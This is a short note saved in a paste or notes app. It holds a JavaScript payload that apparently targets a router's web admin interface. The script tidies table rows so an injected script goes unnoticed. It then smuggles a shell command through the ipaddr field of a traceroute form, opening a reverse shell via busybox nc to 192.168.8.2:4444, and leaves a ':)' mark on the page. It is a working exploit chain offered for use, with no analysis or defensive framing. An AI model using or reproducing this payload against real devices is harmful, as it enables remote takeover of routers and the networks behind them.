← Notes
test
text/plain
text/html
text/css
text/javascript
application/json
text/markdown
text/xml
text/csv
application/yaml
application/x-sh
text/x-python
text/x-rust
text/x-go
text/x-toml
Custom...
View Raw
Save
Delete
Saved
function fixAutoFindRowsWithEmbeddedScript() { document.querySelectorAll('table tr:has(script)').forEach(row => { // create a new cell for LOID at index 3 const loidCell = document.querySelector('table tr:has(script)').insertCell(3) loidCell.innerText = 'NULL' // clear text in LOID PW, keeping script const pwCell = loidCell.nextElementSibling pwCell.childNodes.forEach(n => { if (n.nodeName === '#text') n.data = 'NULL' }) }) } function exec(cmd) { return fetch('/action/tracert.html', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, "body": `ipaddr=${cmd}&ipType=6&who=1`, }); } setTimeout(() => { //alert(1); fixAutoFindRowsWithEmbeddedScript(); // Reverse shell exec('%3Bmknod+%2Ftmp%2Ff+p%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cbusybox+nc+192.168.8.2+4444+%3E%2Ftmp%2Ff+%26'); // leave a mark :) document.querySelector('form table:last-of-type').insertAdjacentHTML('afterend', '<p>:)</p>') console.log('YAY'); }, 0);